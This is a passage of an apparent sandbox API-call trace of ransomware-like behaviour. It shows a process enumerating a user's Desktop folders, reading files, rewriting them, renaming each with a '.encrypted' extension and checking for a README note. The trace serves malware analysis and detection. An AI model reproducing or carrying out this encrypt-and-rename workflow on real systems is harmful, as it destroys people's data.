ftCreationTime.dwHighDateTime=0x1d5ddd8, ftLastAccessTime.dwLowDateTime=0x7b1a46b0, ftLastAccessTime.dwHighDateTime=0x1d5dd41, ftLastWriteTime.dwLowDateTime=0x7b1a46b0, ftLastWriteTime.dwHighDateTime=0x1d5dd41, nFileSizeHigh=0x0, nFileSizeLow=0x13450, dwReserved0=0x0, dwReserved1=0x0, cFileName="J80OgxW_uiCJf7W2I9dX.gif", cAlternateFileName="J80OGX~1.GIF")) returned 1 [0153.935] FindNextFileW (in: hFindFile=0x94ee530, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3e00d0, ftCreationTime.dwHighDateTime=0x1d5e1c7, ftLastAccessTime.dwLowDateTime=0xd67d4290, ftLastAccessTime.dwHighDateTime=0x1d5e779, ftLastWriteTime.dwLowDateTime=0xd67d4290, ftLastWriteTime.dwHighDateTime=0x1d5e779, nFileSizeHigh=0x0, nFileSizeLow=0x14fa6, dwReserved0=0x0, dwReserved1=0x0, cFileName="uauq9y4x.m4a", cAlternateFileName="")) returned 1 [0153.935] FindNextFileW (in: hFindFile=0x94ee530, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0153.935] FindClose (in: hFindFile=0x94ee530 | out: hFindFile=0x94ee530) returned 1 [0153.936] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0153.936] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0153.936] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0153.936] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\F4ijCytc3cL6KrfK5", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\F4ijCytc3cL6KrfK5", lpFilePart=0x0) returned 0x43 [0153.936] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\F4ijCytc3cL6KrfK5\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\F4ijCytc3cL6KrfK5\\", lpFilePart=0x0) returned 0x44 [0153.936] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\F4ijCytc3cL6KrfK5\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf60d0be0, ftCreationTime.dwHighDateTime=0x1d5e2f6, ftLastAccessTime.dwLowDateTime=0xe1268c60, ftLastAccessTime.dwHighDateTime=0x1d5e4ae, ftLastWriteTime.dwLowDateTime=0xe1268c60, ftLastWriteTime.dwHighDateTime=0x1d5e4ae, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee530 [0153.937] FindNextFileW (in: hFindFile=0x94ee530, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf60d0be0, ftCreationTime.dwHighDateTime=0x1d5e2f6, ftLastAccessTime.dwLowDateTime=0xe1268c60, ftLastAccessTime.dwHighDateTime=0x1d5e4ae, ftLastWriteTime.dwLowDateTime=0xe1268c60, ftLastWriteTime.dwHighDateTime=0x1d5e4ae, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.937] FindNextFileW (in: hFindFile=0x94ee530, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45378230, ftCreationTime.dwHighDateTime=0x1d5e2a3, ftLastAccessTime.dwLowDateTime=0xa56396b0, ftLastAccessTime.dwHighDateTime=0x1d5e5bb, ftLastWriteTime.dwLowDateTime=0xa56396b0, ftLastWriteTime.dwHighDateTime=0x1d5e5bb, nFileSizeHigh=0x0, nFileSizeLow=0x1121b, dwReserved0=0x0, dwReserved1=0x0, cFileName="8yFcm4n_T68I.rtf", cAlternateFileName="8YFCM4~1.RTF")) returned 1 [0153.937] FindNextFileW (in: hFindFile=0x94ee530, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e3a53e0, ftCreationTime.dwHighDateTime=0x1d5e4fa, ftLastAccessTime.dwLowDateTime=0x1239a4a0, ftLastAccessTime.dwHighDateTime=0x1d5e0f3, ftLastWriteTime.dwLowDateTime=0x1239a4a0, ftLastWriteTime.dwHighDateTime=0x1d5e0f3, nFileSizeHigh=0x0, nFileSizeLow=0x16a59, dwReserved0=0x0, dwReserved1=0x0, cFileName="IUkul4HRK.avi", cAlternateFileName="IUKUL4~1.AVI")) returned 1 [0153.937] FindNextFileW (in: hFindFile=0x94ee530, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8144860, ftCreationTime.dwHighDateTime=0x1d5ddd8, ftLastAccessTime.dwLowDateTime=0x7b1a46b0, ftLastAccessTime.dwHighDateTime=0x1d5dd41, ftLastWriteTime.dwLowDateTime=0x7b1a46b0, ftLastWriteTime.dwHighDateTime=0x1d5dd41, nFileSizeHigh=0x0, nFileSizeLow=0x13450, dwReserved0=0x0, dwReserved1=0x0, cFileName="J80OgxW_uiCJf7W2I9dX.gif", cAlternateFileName="J80OGX~1.GIF")) returned 1 [0153.937] FindNextFileW (in: hFindFile=0x94ee530, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3e00d0, ftCreationTime.dwHighDateTime=0x1d5e1c7, ftLastAccessTime.dwLowDateTime=0xd67d4290, ftLastAccessTime.dwHighDateTime=0x1d5e779, ftLastWriteTime.dwLowDateTime=0xd67d4290, ftLastWriteTime.dwHighDateTime=0x1d5e779, nFileSizeHigh=0x0, nFileSizeLow=0x14fa6, dwReserved0=0x0, dwReserved1=0x0, cFileName="uauq9y4x.m4a", cAlternateFileName="")) returned 1 [0153.938] FindNextFileW (in: hFindFile=0x94ee530, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3e00d0, ftCreationTime.dwHighDateTime=0x1d5e1c7, ftLastAccessTime.dwLowDateTime=0xd67d4290, ftLastAccessTime.dwHighDateTime=0x1d5e779, ftLastWriteTime.dwLowDateTime=0xd67d4290, ftLastWriteTime.dwHighDateTime=0x1d5e779, nFileSizeHigh=0x0, nFileSizeLow=0x14fa6, dwReserved0=0x0, dwReserved1=0x0, cFileName="uauq9y4x.m4a", cAlternateFileName="")) returned 0 [0153.938] FindClose (in: hFindFile=0x94ee530 | out: hFindFile=0x94ee530) returned 1 [0153.938] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0153.938] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0153.938] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\F4ijCytc3cL6KrfK5\\8yFcm4n_T68I.rtf", nBufferLength=0x105, lpBuffer=0x2ee26c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\F4ijCytc3cL6KrfK5\\8yFcm4n_T68I.rtf", lpFilePart=0x0) returned 0x54 [0153.938] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee760) returned 1 [0153.939] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\F4ijCytc3cL6KrfK5\\8yFcm4n_T68I.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\f4ijcytc3cl6krfk5\\8yfcm4n_t68i.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.940] GetFileType (hFile=0x4d0) returned 0x1 [0153.940] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee75c) returned 1 [0153.940] GetFileType (hFile=0x4d0) returned 0x1 [0153.940] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee868 | out: lpFileSizeHigh=0x2ee868*=0x0) returned 0x1121b [0153.940] ReadFile (in: hFile=0x4d0, lpBuffer=0x23236b8, nNumberOfBytesToRead=0x1121b, lpNumberOfBytesRead=0x2ee814, lpOverlapped=0x0 | out: lpBuffer=0x23236b8*, lpNumberOfBytesRead=0x2ee814*=0x1121b, lpOverlapped=0x0) returned 1 [0153.942] CloseHandle (hObject=0x4d0) returned 1 [0153.958] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0153.958] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0153.958] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee85c | out: lpFileInformation=0x2ee85c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.958] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0153.958] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\F4ijCytc3cL6KrfK5\\8yFcm4n_T68I.rtf", nBufferLength=0x105, lpBuffer=0x2ee254, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\F4ijCytc3cL6KrfK5\\8yFcm4n_T68I.rtf", lpFilePart=0x0) returned 0x54 [0153.958] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee748) returned 1 [0153.958] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\F4ijCytc3cL6KrfK5\\8yFcm4n_T68I.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\f4ijcytc3cl6krfk5\\8yfcm4n_t68i.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.959] GetFileType (hFile=0x4d0) returned 0x1 [0153.959] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee744) returned 1 [0153.959] GetFileType (hFile=0x4d0) returned 0x1 [0153.959] WriteFile (in: hFile=0x4d0, lpBuffer=0x23a3c38*, nNumberOfBytesToWrite=0x11220, lpNumberOfBytesWritten=0x2ee804, lpOverlapped=0x0 | out: lpBuffer=0x23a3c38*, lpNumberOfBytesWritten=0x2ee804*=0x11220, lpOverlapped=0x0) returned 1 [0153.965] CloseHandle (hObject=0x4d0) returned 1 [0153.966] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\F4ijCytc3cL6KrfK5\\8yFcm4n_T68I.rtf", nBufferLength=0x105, lpBuffer=0x2ee38c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\F4ijCytc3cL6KrfK5\\8yFcm4n_T68I.rtf", lpFilePart=0x0) returned 0x54 [0153.966] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\F4ijCytc3cL6KrfK5\\8yFcm4n_T68I.rtf.encrypted", nBufferLength=0x105, lpBuffer=0x2ee38c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\F4ijCytc3cL6KrfK5\\8yFcm4n_T68I.rtf.encrypted", lpFilePart=0x0) returned 0x5e [0153.966] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ec) returned 1 [0153.966] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\F4ijCytc3cL6KrfK5\\8yFcm4n_T68I.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\f4ijcytc3cl6krfk5\\8yfcm4n_t68i.rtf"), fInfoLevelId=0x0, lpFileInformation=0x2ee868 | out: lpFileInformation=0x2ee868*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45378230, ftCreationTime.dwHighDateTime=0x1d5e2a3, ftLastAccessTime.dwLowDateTime=0xa56396b0, ftLastAccessTime.dwHighDateTime=0x1d5e5bb, ftLastWriteTime.dwLowDateTime=0x42bd6680, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x11220)) returned 1 [0153.966] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7e8) returned 1 [0153.966] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\F4ijCytc3cL6KrfK5\\8yFcm4n_T68I.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\f4ijcytc3cl6krfk5\\8yfcm4n_t68i.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\F4ijCytc3cL6KrfK5\\8yFcm4n_T68I.rtf.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\f4ijcytc3cl6krfk5\\8yfcm4n_t68i.rtf.encrypted")) returned 1 [0153.967] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\F4ijCytc3cL6KrfK5\\IUkul4HRK.avi", nBufferLength=0x105, lpBuffer=0x2ee26c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\F4ijCytc3cL6KrfK5\\IUkul4HRK.avi", lpFilePart=0x0) returned 0x51 [0153.968] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee760) returned 1 [0153.968] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\F4ijCytc3cL6KrfK5\\IUkul4HRK.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\f4ijcytc3cl6krfk5\\iukul4hrk.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.968] GetFileType (hFile=0x4d0) returned 0x1 [0153.968] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee75c) returned 1 [0153.968] GetFileType (hFile=0x4d0) returned 0x1 [0153.969] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee868 | out: lpFileSizeHigh=0x2ee868*=0x0) returned 0x16a59 [0153.969] ReadFile (in: hFile=0x4d0, lpBuffer=0x5283878, nNumberOfBytesToRead=0x16a59, lpNumberOfBytesRead=0x2ee814, lpOverlapped=0x0 | out: lpBuffer=0x5283878*, lpNumberOfBytesRead=0x2ee814*=0x16a59, lpOverlapped=0x0) returned 1 [0153.974] CloseHandle (hObject=0x4d0) returned 1 [0153.995] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0153.995] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0153.996] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee85c | out: lpFileInformation=0x2ee85c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.996] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0153.996] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\F4ijCytc3cL6KrfK5\\IUkul4HRK.avi", nBufferLength=0x105, lpBuffer=0x2ee254, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\F4ijCytc3cL6KrfK5\\IUkul4HRK.avi", lpFilePart=0x0) returned 0x51 [0153.996] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee748) returned 1 [0153.996] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\F4ijCytc3cL6KrfK5\\IUkul4HRK.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\f4ijcytc3cl6krfk5\\iukul4hrk.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.997] GetFileType (hFile=0x4d0) returned 0x1 [0153.997] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee744) returned 1 [0153.997] GetFileType (hFile=0x4d0) returned 0x1 [0153.997] WriteFile (in: hFile=0x4d0, lpBuffer=0x52f4c90*, nNumberOfBytesToWrite=0x16a60, lpNumberOfBytesWritten=0x2ee804, lpOverlapped=0x0 | out: lpBuffer=0x52f4c90*, lpNumberOfBytesWritten=0x2ee804*=0x16a60, lpOverlapped=0x0) returned 1 [0153.999] CloseHandle (hObject=0x4d0) returned 1 [0154.001] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\F4ijCytc3cL6KrfK5\\IUkul4HRK.avi", nBufferLength=0x105, lpBuffer=0x2ee38c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\F4ijCytc3cL6KrfK5\\IUkul4HRK.avi", lpFilePart=0x0) returned 0x51 [0154.001] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\F4ijCytc3cL6KrfK5\\IUkul4HRK.avi.encrypted", nBufferLength=0x105, lpBuffer=0x2ee38c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\F4ijCytc3cL6KrfK5\\IUkul4HRK.avi.encrypted", lpFilePart=0x0) returned 0x5b [0154.001] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ec) returned 1 [0154.001] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\F4ijCytc3cL6KrfK5\\IUkul4HRK.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\f4ijcytc3cl6krfk5\\iukul4hrk.avi"), fInfoLevelId=0x0, lpFileInformation=0x2ee868 | out: lpFileInformation=0x2ee868*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e3a53e0, ftCreationTime.dwHighDateTime=0x1d5e4fa, ftLastAccessTime.dwLowDateTime=0x1239a4a0, ftLastAccessTime.dwHighDateTime=0x1d5e0f3, ftLastWriteTime.dwLowDateTime=0x42c22940, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x16a60)) returned 1 [0154.001] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7e8) returned 1 [0154.001] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\F4ijCytc3cL6KrfK5\\IUkul4HRK.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\f4ijcytc3cl6krfk5\\iukul4hrk.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\F4ijCytc3cL6KrfK5\\IUkul4HRK.avi.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\f4ijcytc3cl6krfk5\\iukul4hrk.avi.encrypted")) returned 1 [0154.002] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.002] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu", lpFilePart=0x0) returned 0x38 [0154.002] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\", lpFilePart=0x0) returned 0x39 [0154.002] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1881900, ftCreationTime.dwHighDateTime=0x1d5e0fa, ftLastAccessTime.dwLowDateTime=0xa89c79b0, ftLastAccessTime.dwHighDateTime=0x1d5e43e, ftLastWriteTime.dwLowDateTime=0xa89c79b0, ftLastWriteTime.dwHighDateTime=0x1d5e43e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee630 [0154.004] FindNextFileW (in: hFindFile=0x94ee630, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1881900, ftCreationTime.dwHighDateTime=0x1d5e0fa, ftLastAccessTime.dwLowDateTime=0xa89c79b0, ftLastAccessTime.dwHighDateTime=0x1d5e43e, ftLastWriteTime.dwLowDateTime=0xa89c79b0, ftLastWriteTime.dwHighDateTime=0x1d5e43e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.004] FindNextFileW (in: hFindFile=0x94ee630, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34531e30, ftCreationTime.dwHighDateTime=0x1d5e293, ftLastAccessTime.dwLowDateTime=0x503224a0, ftLastAccessTime.dwHighDateTime=0x1d5e0ba, ftLastWriteTime.dwLowDateTime=0x503224a0, ftLastWriteTime.dwHighDateTime=0x1d5e0ba, nFileSizeHigh=0x0, nFileSizeLow=0x3958, dwReserved0=0x0, dwReserved1=0x0, cFileName="1T7hbySAx_O.flv", cAlternateFileName="1T7HBY~1.FLV")) returned 1 [0154.005] FindNextFileW (in: hFindFile=0x94ee630, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74ba96f0, ftCreationTime.dwHighDateTime=0x1d5e0dc, ftLastAccessTime.dwLowDateTime=0x7f032a90, ftLastAccessTime.dwHighDateTime=0x1d5dd4a, ftLastWriteTime.dwLowDateTime=0x7f032a90, ftLastWriteTime.dwHighDateTime=0x1d5dd4a, nFileSizeHigh=0x0, nFileSizeLow=0x4b26, dwReserved0=0x0, dwReserved1=0x0, cFileName="sVNB4Q6EMhZ-85Nyf.m4a", cAlternateFileName="SVNB4Q~1.M4A")) returned 1 [0154.005] FindNextFileW (in: hFindFile=0x94ee630, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10530440, ftCreationTime.dwHighDateTime=0x1d5dd17, ftLastAccessTime.dwLowDateTime=0x520ea050, ftLastAccessTime.dwHighDateTime=0x1d5dd9a, ftLastWriteTime.dwLowDateTime=0x520ea050, ftLastWriteTime.dwHighDateTime=0x1d5dd9a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UZv83ywZ1", cAlternateFileName="UZV83Y~1")) returned 1 [0154.005] FindNextFileW (in: hFindFile=0x94ee630, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaad53f20, ftCreationTime.dwHighDateTime=0x1d5dd4d, ftLastAccessTime.dwLowDateTime=0xac16dc90, ftLastAccessTime.dwHighDateTime=0x1d5e18f, ftLastWriteTime.dwLowDateTime=0xac16dc90, ftLastWriteTime.dwHighDateTime=0x1d5e18f, nFileSizeHigh=0x0, nFileSizeLow=0x15c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="yfEyi0g4or WM2-.csv", cAlternateFileName="YFEYI0~1.CSV")) returned 1 [0154.005] FindNextFileW (in: hFindFile=0x94ee630, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x334ce130, ftCreationTime.dwHighDateTime=0x1d5e174, ftLastAccessTime.dwLowDateTime=0xb8dc6860, ftLastAccessTime.dwHighDateTime=0x1d5e332, ftLastWriteTime.dwLowDateTime=0xb8dc6860, ftLastWriteTime.dwHighDateTime=0x1d5e332, nFileSizeHigh=0x0, nFileSizeLow=0x2086, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZWOOCJ aKdwB n.png", cAlternateFileName="ZWOOCJ~1.PNG")) returned 1 [0154.005] FindNextFileW (in: hFindFile=0x94ee630, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd56c9450, ftCreationTime.dwHighDateTime=0x1d5d86f, ftLastAccessTime.dwLowDateTime=0x57ce95b0, ftLastAccessTime.dwHighDateTime=0x1d5e2a7, ftLastWriteTime.dwLowDateTime=0x57ce95b0, ftLastWriteTime.dwHighDateTime=0x1d5e2a7, nFileSizeHigh=0x0, nFileSizeLow=0x173ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="zY_e0OtuhW9esck3P.png", cAlternateFileName="ZY_E0O~1.PNG")) returned 1 [0154.005] FindNextFileW (in: hFindFile=0x94ee630, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0154.005] FindClose (in: hFindFile=0x94ee630 | out: hFindFile=0x94ee630) returned 1 [0154.006] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 